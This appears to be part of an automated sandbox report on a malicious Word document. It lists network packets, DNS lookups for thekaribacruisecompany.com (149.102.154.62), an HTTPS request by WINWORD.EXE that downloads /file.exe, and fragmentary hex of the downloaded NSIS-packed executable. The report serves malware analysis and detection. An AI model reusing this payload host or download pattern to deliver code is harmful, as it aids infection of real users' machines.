                                                          Mar 18, 2023 05:35:12.121607065 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.121612072 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.121628046 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.121670961 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.121762991 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.121776104 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.121788979 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.121820927 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.121824026 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.121884108 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.121896029 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122040033 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.122051954 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122085094 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122117043 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.122147083 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122205973 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.122219086 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122354984 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.122411966 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122473955 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122479916 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.122503042 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.122544050 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.122684956 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.125730991 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.125818014 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.125844955 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.125864029 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.125890970 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.126527071 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.126585007 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.126621008 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.126636982 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.126676083 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.127110958 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.127161026 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.127203941 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.127221107 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.127296925 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.127702951 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.127760887 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.127782106 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.127798080 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.127824068 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.128268003 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.128349066 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.128350019 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.128370047 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.128417015 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.128854036 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.128932953 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.128936052 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.128957987 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.129020929 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.129447937 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.129533052 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.129538059 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.129556894 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.129611015 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.129975080 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.130060911 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.130131960 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.130183935 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.130270004 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.130381107 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.130753040 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.130815029 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.130826950 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.130844116 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.130896091 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.131016016 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.225194931 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.225440025 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.225518942 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.225580931 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.225625038 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.225693941 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.295933008 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296056986 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296128988 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.296183109 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296211958 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.296253920 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296339035 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296367884 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.296367884 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.296395063 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296427011 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.296477079 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296557903 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296565056 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.296591043 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.296650887 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.297197104 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.331087112 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.331309080 CET44349172149.102.154.62192.168.2.22
                                                          Mar 18, 2023 05:35:12.331335068 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.331430912 CET49172443192.168.2.22149.102.154.62
                                                          Mar 18, 2023 05:35:12.333359003 CET49172443192.168.2.22149.102.154.62

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 18, 2023 05:35:09.025356054 CET5586853192.168.2.228.8.8.8
                                                          Mar 18, 2023 05:35:09.050968885 CET53558688.8.8.8192.168.2.22
                                                          Mar 18, 2023 05:35:11.517184019 CET4968853192.168.2.228.8.8.8
                                                          Mar 18, 2023 05:35:11.542437077 CET53496888.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Mar 18, 2023 05:35:09.025356054 CET192.168.2.228.8.8.80x478cStandard query (0)thekaribacruisecompany.comA (IP address)IN (0x0001)false
                                                          Mar 18, 2023 05:35:11.517184019 CET192.168.2.228.8.8.80x78e0Standard query (0)thekaribacruisecompany.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Mar 18, 2023 05:35:09.050968885 CET8.8.8.8192.168.2.220x478cNo error (0)thekaribacruisecompany.com149.102.154.62A (IP address)IN (0x0001)false
                                                          Mar 18, 2023 05:35:11.542437077 CET8.8.8.8192.168.2.220x78e0No error (0)thekaribacruisecompany.com149.102.154.62A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • thekaribacruisecompany.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.2249171149.102.154.62443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          2023-03-18 04:35:09 UTC0OUTGET /file.exe HTTP/1.1
                                                          Accept: */*
                                                          UA-CPU: AMD64
                                                          Accept-Encoding: gzip, deflate
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                          Host: thekaribacruisecompany.com
                                                          Connection: Keep-Alive
                                                          2023-03-18 04:35:09 UTC0INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 18 Mar 2023 04:35:09 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 676320
                                                          Connection: close
                                                          Last-Modified: Fri, 17 Mar 2023 04:56:55 GMT
                                                          Accept-Ranges: bytes
                                                          2023-03-18 04:35:09 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 9d 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 ac 04 00 00 20 00 00 b3 33 00 00 00 10 00 00 00 80 00 00 00 00 40
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPELOaf 3@
                                                          2023-03-18 04:35:09 UTC16INData Raw: 40 8b 45 14 53 56 8b 75 10 57 6a dc 85 c0 5b 74 0b 0f ac c6 14 c1 e8 14 33 ff eb 4e 6a 14 81 fe 00 00 10 00 59 8b c6 73 06 6a 0a 59 6a dd 5b 81 fe 00 04 00 00 73 05 6a de 33 c9 5b 81 fe 33 33 ff ff 73 0d 33 c0 6a 14 40 5f d3 e0 99 f7 ff 03 c6 8b f0 25 ff ff ff 00 6a 0a 33 d2 8d 04 80 03 c0 d3 e8 d3 ee 59 f7 f1 8b fa 8d 45 e0 6a df 50 e8 53 17 00 00 50 8d 45 c0 53 50 e8 48 17 00 00 50 57 56 68 08 a2 40 00 ff 75 0c be 90 c0 43 00 56 e8 32 17 00 00 56 8b f8 e8 ad 16 00 00 03 f8 57 ff 15 34 82 40 00 83 c4 18 56 ff 75 08 ff 35 f8 e3 44 00 e8 70 0d 00 00 5f 5e 5b c9 c2 10 00 8b 44 24 0c 33 c9 51 50 ff 74 24 10 ff 74 24 10 e8 26 ff ff ff c2 0c 00 8b 15 4c 24 45 00 8b 0d 48 24 45 00 33 c0 85 d2 74 18 56 f6 41 08 01 74 07 8b 74 24 08 03 04 b1 81 c1 18 20 00 00 4a
                                                          Data Ascii: @ESVuWj[t3NjYsjYj[sj3[33s3j@_%j3YEjPSPESPHPWVh@uCV2VW4@Vu5Dp_^[D$3QPt$t$&L$EH$E3tVAtt$ J
                                                          2023-03-18 04:35:09 UTC32INData Raw: 2e 20 25 64 25 25 00 00 00 00 53 65 53 68 75 74 64 6f 77 6e 50 72 69 76 69 6c 65 67 65 00 41 00 00 00 2e 74 6d 70 00 00 00 00 41 00 00 00 7e 6e 73 75 00 00 00 00 20 5f 3f 3d 00 00 00 00 54 4d 50 00 54 45 4d 50 00 00 00 00 4c 6f 77 00 5c 54 65 6d 70 00 00 00 20 2f 44 3d 00 00 00 00 4e 43 52 43 00 00 00 00 4e 53 49 53 20 45 72 72 6f 72 00 00 00 00 00 00 45 72 72 6f 72 20 77 72 69 74 69 6e 67 20 74 65 6d 70 6f 72 61 72 79 20 66 69 6c 65 2e 20 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 72 20 74 65 6d 70 20 66 6f 6c 64 65 72 20 69 73 20 76 61 6c 69 64 2e 00 00 ff ff ff ff 3f 44 40 00 d9 4c 40 00 66 47 40 00 b6 54 40 00 1f 47 40 00 5f 4e 62 00 2e 65 78 65 00 00 00 00 6f 70 65 6e 00 00 00 00 25 75 2e 25 75 25 73 25 73 00 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00
                                                          Data Ascii: . %d%%SeShutdownPrivilegeA.tmpA~nsu _?=TMPTEMPLow\Temp /D=NCRCNSIS ErrorError writing temporary file. Make sure your temp folder is valid.?D@L@fG@T@G@_Nb.exeopen%u.%u%s%s(
                                                          2023-03-18 04:35:09 UTC48INData Raw: 43 ff d8 09 09 ff e8 09 09 ff c6 0c 20 20 ba 0d 0d ff 58 00 00 ff 26 2b 2b ff ef f0 f0 20 f7 f7 f7 ff 46 47 47 ff 02 00 00 ff 42 41 41 ff ec ed ed ff f8 f8 f8 ff 35 36 36 ff 39 3b 3b ff 1c 1d 1d ff 1f 00 00 ff 97 22 22 ff b6 5e 5e ff 4c 4b 20 ff 00 00 00 ff 51 50 50 ff ec ed ed ff d8 d9 d9 ff c8 c7 c7 ff b5 ba ba ff a5 ae 20 ff 9b 9d 9d ff 8f 8e 8e 20 82 82 82 ff 76 76 76 ff 6e 6e 6e ff 69 69 69 ff 20 66 66 ff 6d 6d 6d ff 74 74 74 ff 7d 7d 7d ff 79 79 79 ff 4a 4a 4a ff 1a 1a 1a f7 00 00 00 a9 00 00 00 a1 00 00 00 88 00 00 00 60 00 00 00 39 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 3c e8 e8 e8 20 c2 c2 c2 ff b2 b2 b2 ff b5 b5 b5 ff b9 20 b9 ff bc bc bc ff c9 c9 c9 ff 7e 84 84 ff 61 66 66 ff c5
                                                          Data Ascii: C X&++ FGGBAA5669;;""^^LK QPP vvvnnniii ffmmmttt}}}yyyJJJ`9< ~aff
                                                          2023-03-18 04:35:09 UTC64INData Raw: 00 3a 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f7 f7 f7 1e ef ef ef d5 cd cd cd ff ba ba ba ff bc bc bc ff c1 c1 c1 ff c5 c5 c5 ff c9 c9 c9 ff cd cc cc ff d4 d2 d2 ff db e3 e3 ff e0 e9 e9 ff fa 7d 7d ff eb 14 14 ff 5b 1f 1f ff 78 88 88 ff e7 e8 e8 ff e5 e5 e5 ff ab ab ab ff 6b 6b 6b ff 2a 2a 2a ff 0a 09 09 20 2c 33 33 ff 5a 52 52 ff aa 46 46 ff bd 3b 3b ff a3 2f 2f ff 61 15 15 ff 29 23 23 ff d7 dc dc ff a0 a0 a0 ff 00 00 00 ff 53 53 53 ff f6 f6 f6 ff fa fa fa ff 64 66 66 ff 00 00 00 ff 31 12 12 ff 46 2f 2f ff 49 47 47 ff 8a 91 91 ff 78 85 85 ff 3b 25 25 ff da 78 78 ff ff 93 93 20 f6 b8 b8 ff e7 ec ec ff e5 e6 e6 ff e3 e3 e3 ff e2 e2 e2 ff e3 e3 e3 ff c9 c9 c9 ff 6f 6f 6f ff 14 14 14 dc 00 00 00 a2 00 00 00 92 00 00 00 66 00
                                                          Data Ascii: :}}[xkkk*** ,33ZRRFF;;//a)##SSSdff1F//IGGx;%%xx ooof
                                                          2023-03-18 04:35:09 UTC80INData Raw: 92 ff c5 96 96 ff ff dc dc ff ff dd dd ff ff d7 d7 ff b7 86 86 d8 23 15 15 5a 20 00 00 0c 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5d 5d bf 5f 5f 5f ff 11 11 11 ff 01 01 01 ff 20 20 20 fb b2 b2 b2 eb e8 e8 e8 df dc dc dc d6 e2 e2 e2 d0 e4 e4 e4 ce e3 e3 e3 cf e0 e0 e0 d3 dd dd dd d9 da da da e2 d6 d6 d6 eb d1 d1 d1 f8 cd cd cd fe c9 c9 c9 ff c6 c6 c6 ff c3 c3 c3 ff bf bf bf ff be be be ff be be be ff bf be be ff c3 c2 c2 ff c6 c6 c6 ff ca c9 c9 ff ce cc 20 20 d0 cf cf 20 d2 d2 d2 ff d7 d7 d7 ff c4 c8 c8 ff 9e 92 92 ff c8 9d 9d ff ff e4 e4 ff ff dd dd ff b2 86 86 cd 1c 11 11 44 00 00 00 20 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c
                                                          Data Ascii: #Z ]]___ D l
                                                          2023-03-18 04:35:09 UTC96INData Raw: 00 00 00 20 00 00 00 03 00 00 00 07 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 48 08 ca 80 07 00 00 00 00 00 60 01 a2 00 00 00 00 00 00 00 08 00 00 00 00 01 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 00 00 00 00 00 00 00 00 00 00 03 40 f3 00 8e 00 32 00 0e 00 03 00 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 27 01 8e 00 32 00 0e 00 01 00 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 50 4f 00 8e 00 32 00 0e 00 02 00 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 02 50 4f 00 8a 00 0b 01 01 00 ff ff 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 02 40 4f 00 06 00 0a 01 82 00 fa 03 00 00 ff ff 82 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 02 58 83 00 91 00 6c
                                                          Data Ascii: H`MS Shell Dlg@2P'2PO2PO@OXl
                                                          2023-03-18 04:35:09 UTC112INData Raw: 4a 77 c3 28 29 2c 39 f0 58 66 36 ae ec 72 cc 72 56 13 97 47 1a eb fc 2d 7f 82 c7 d7 de c8 ea d2 9f 8b 5a ec 09 9f 46 d3 5c 4d d1 2c c7 87 6a 7d c4 b0 68 72 4f 36 86 55 2a 44 72 5f 7a 91 0a b9 c4 65 11 0f 86 20 d7 99 b6 2e fd 52 ba 07 2f 99 b6 64 6c f6 b6 2d cf aa 6e 0a 99 1f 37 76 81 3c ae 80 ec fa 56 03 ca 71 bd 31 a3 2a 68 53 74 9c db c3 e5 8a 8e 9b 99 c7 37 d3 30 cd f2 dd bb 60 92 fb 29 ce 9a c8 c3 4d 9c 2e dd 94 9f bb 73 26 6e 50 fe 2d 39 2e 59 d3 2c dd 3d a5 08 5e ea f9 12 91 59 8b 33 46 6c 8a 61 70 6b 9a 19 3c 72 12 35 1f 59 60 04 ee 2a ef b1 4c ac fe d0 47 af df f3 e3 e7 96 98 d0 c4 87 f7 ad b5 c2 93 66 b9 4d 6a b2 47 ee 4f fe 04 9b 67 83 ba b9 ed b0 1d c6 06 f3 4c 50 2f 16 c3 2a f3 3e 2a c3 a9 f0 56 26 90 49 16 3b 6f 6b a3 f3 e8 7a c0 04 90 75 e4
                                                          Data Ascii: Jw(),9Xf6rrVG-ZF\M,j}hrO6U*Dr_ze .R/dl-n7v<Vq1*hSt70`)M.s&nP-9.Y,=^Y3Flapk<r5Y`*LGfMjGOgLP/*>*V&I;okzu
                                                          2023-03-18 04:35:09 UTC128INData Raw: ef 7b e0 35 fe 2b 27 b7 40 9a 02 43 83 c5 3f b9 ff b0 ae d6 b0 b9 36 a3 5d b7 4a 56 c3 9b 73 68 1f 35 b6 12 9e 22 d7 5c ca 71 4f e3 1c 8a 7f b6 af a9 7b ab 8f aa 90 fb 2f 6d 17 6d 9b 97 a0 ad 4c d1 9f 74 42 ec 2a a6 ba 9f 7a ce 62 d9 7f 2a cd c8 2c bb fe a8 de 21 3a a8 ef d9 a9 53 f7 be 44 f9 db d7 31 bd 6a e6 25 d6 c8 df 16 1a 07 45 0c 4d c0 cd 9f 14 fa 4c 41 fa 1a 13 f3 40 ea ba d7 c0 f5 46 9e 5f c7 6f d5 e9 3a 27 b3 b6 d4 cf 8e ee 12 bb 3f 67 b8 85 b8 29 ba 13 a6 06 a2 77 64 b3 1c 5f 28 e2 f1 7d 94 1a b2 37 b7 4e b0 6c 5a a5 74 be 2f 11 e1 49 28 7c 94 f3 19 14 0c b3 0f 8c 84 1b 47 5f 1b 9f d9 b7 f9 9f 3d ee fe 3f 50 45 0a 62 d8 f3 05 62 81 14 b0 1e 40 fa 8d 17 75 8b 10 4b cb dd eb 27 80 17 a6 5d ad f5 d4 be c8 76 bc cb fa e3 1f 5f 23 0e 4a fd a0 3f bc
                                                          Data Ascii: {5+'@C?6]JVsh5"\qO{/mmLtB*zb*,!:SD1j%EMLA@F_o:'?g)wd_(}7NlZt/I(|G_=?PEbb@uK']v_#J?
                                                          2023-03-18 04:35:09 UTC144INData Raw: 4f af 85 88 4b 75 c7 0a 45 70 ae f7 38 24 44 fc cc 58 b9 4c f9 1b e8 fc 76 b8 e1 9b ac dd 0b 8e a6 17 35 de c8 00 99 2a f8 be 46 48 48 2d 3b 4c 0e c8 b4 9d 98 6c fe 8b fb 31 64 ed 04 cb 9c 3f 7d 31 a7 86 2e ed d8 fa 92 e1 31 93 d2 f7 18 8d cd b2 6e fa 35 ad 02 c0 9e 1f 0a 37 39 83 4e 3d dc 3f 00 ca a6 79 ca d9 c1 75 51 53 64 27 50 f5 e1 86 9d 2a 5d de 69 42 ea c3 70 da 0b 04 9f 59 8a 8f 4d c5 25 e4 e0 06 49 33 2f e0 a1 aa 2f e5 3c a0 da 47 a9 da ab 70 7d 6f a5 0a 09 54 bb 73 44 e4 22 5d d9 df ee c8 f8 31 4b 0e 31 fb 9e 76 67 71 86 00 b4 da ed bc 43 e6 67 6e e0 39 44 ee 7c 28 3e 0e 26 3c 2e 04 3d 80 22 ec 71 f1 07 24 78 8d 19 f5 9b c5 b9 65 9c 47 dd af ac e5 c4 84 96 6f 0e fe c0 5a 7f d9 54 aa 50 0c 2f d6 22 f8 8a e8 fc 05 ad 91 f9 5a 78 0e 7f 1b 26 db 69
                                                          Data Ascii: OKuEp8$DXLv5*FHH-;Ll1d?}1.1n579N=?yuQSd'P*]iBpYM%I3//<Gp}oTsD"]1K1vgqCgn9D|(>&<.="q$xeGoZTP/"Zx&i
                                                          2023-03-18 04:35:09 UTC160INData Raw: e0 e3 00 4a 22 10 77 32 c4 f2 11 64 70 2e 49 19 c3 ca 47 35 43 74 ed f1 f1 5f de 63 69 13 46 97 b0 be 42 c2 16 a0 a8 a4 5c ba 62 4f 43 d8 63 93 8a e4 37 33 87 78 33 9f 43 42 4f 13 4f b9 02 b5 e7 bb e9 3c 94 66 62 66 8a 1d 39 79 ee 49 e9 f6 9f ef 91 df f0 fe 84 e8 a3 e2 80 98 a3 d5 91 97 9f 45 1b 43 16 fa a0 c9 cf f8 b6 31 3d 56 ce cc 4d e7 3a 53 b8 49 8e 1b 6b 01 4a 7d 6a 7b f6 03 5e f4 b2 4a 60 27 8e b7 7f 70 f4 50 be 28 1c 76 3c 95 59 3c b5 3a 62 bd 1b 12 69 4e bc e2 ae f8 ee a7 cf f2 fc 98 1a 55 e6 16 a5 fa d9 89 71 67 98 5a 87 5d c4 e7 e0 82 44 79 56 e1 a1 8b f5 47 a7 40 39 7c e7 76 3a ea 4b af f0 e1 fb 53 4f ae dd 60 d7 fd c6 e6 ec c1 f4 4c 72 f1 d3 13 58 75 1c fe 76 e7 e7 b3 c3 dd a0 4c 10 5b f0 65 ce a0 b5 a4 c7 7b 41 2e 8d a9 67 43 70 9d cd a4 f5
                                                          Data Ascii: J"w2dp.IG5Ct_ciFB\bOCc73x3CBOO<fbf9yIEC1=VM:SIkJ}j{^J`'pP(v<Y<:biNUqgZ]DyVG@9|v:KSO`LrXuvL[e{A.gCp
                                                          2023-03-18 04:35:09 UTC176INData Raw: ab 60 6e c4 34 63 a0 bd b9 04 ee 72 ed 76 9d 4d f9 ce 2d 40 24 f4 a3 fc 81 e5 27 a7 1f 5b bb 86 b6 f5 31 9f 7a 78 9c 8c 94 0d f7 78 73 cf ac e8 fc fc 8c 96 04 4c 2d a7 14 44 82 32 fc da 3c 0d 30 f5 b4 43 82 e9 7f d5 d0 88 ef d9 eb 97 fe 3a 56 7a eb 9f cb 94 d8 a5 de bd 0d d9 2a 9e b4 bb 76 4c e4 3d f1 ab d0 17 a4 4a 04 57 dd 6c e3 0f 8e 8e f9 db ad 2a de 99 a2 34 1f c1 c4 be b7 f6 dc 50 1a 25 df 61 cd 19 90 97 b7 e9 c1 cd 2f 2a 1f 3e 02 a5 df a7 77 85 d0 b9 fd 85 35 74 71 5f af b7 be de 75 7a d3 36 86 b0 4e f5 24 9d 1c c9 3a d6 df b8 1c 82 9b 5d a2 8a ea 40 e9 cd 94 b0 01 b8 79 55 a2 24 00 64 cf 3e 3b 88 fd db 17 8a e4 de 1c 32 d5 f6 2d c7 22 64 91 f6 c8 30 2b 89 d1 db fb da f3 a9 47 d1 79 dd ed 97 af c0 54 dd 83 1f 1e 80 2a 6c fb f7 6d 61 61 57 43 7c 7f
                                                          Data Ascii: `n4crvM-@$'[1zxxsL-D2<0C:Vz*vL=JWl*4P%a/*>w5tq_uz6N$:]@yU$d>;2-"d0+GyT*lmaaWC|
                                                          2023-03-18 04:35:09 UTC192INData Raw: 1d a4 7e e1 9d cf 0c 8f f2 dd d7 e4 23 f5 36 f4 b7 95 89 bf 37 2a b6 b3 a9 97 ca 3a 2f 87 f0 64 66 2a 97 ad d4 ed 90 cd f8 bc e7 91 4f c6 1a c5 6e 6a fe 64 49 54 a9 47 e0 42 7a de da e3 6f 03 17 6e f4 50 09 36 38 f6 89 eb be 97 72 19 78 0d ce 0e 5a ae 57 52 d7 7b ed 1a 13 d7 87 2b 42 9b 9e 72 5a 84 57 a7 33 f8 c9 e8 18 69 c6 b8 71 7e ab b0 80 c4 4b d1 cf 14 3a f2 4b 54 1e ee d7 2d 4a 09 71 4b a6 fd 27 a5 6c c1 ce 4d ab bf cd b4 a9 0a 2f 33 b5 29 f0 c6 44 ad 8c 74 52 4c 50 e7 f2 bf fa 8d ff 97 fc 58 69 16 4e 95 1a 01 d9 3b 8d 54 20 c4 e4 30 63 fa f2 bf 3d 4f e7 ce cb 79 2a d1 64 15 7c 0d e1 36 9e d7 5e ef b8 ee ac 79 7e c0 17 e1 c3 be e7 e4 49 c5 6c 26 f5 9c fa 7e f4 4a 4a 46 9b c4 72 bd 76 15 91 1b 31 7c ea a3 80 b8 67 36 bf 60 82 43 de c6 db 7d 0a ed 80
                                                          Data Ascii: ~#67*:/df*OnjdITGBzonP68rxZWR{+BrZW3iq~K:KT-JqK'lM/3)DtRLPXiN;T 0c=Oy*d|6^y~Il&~JJFrv1|g6`C}
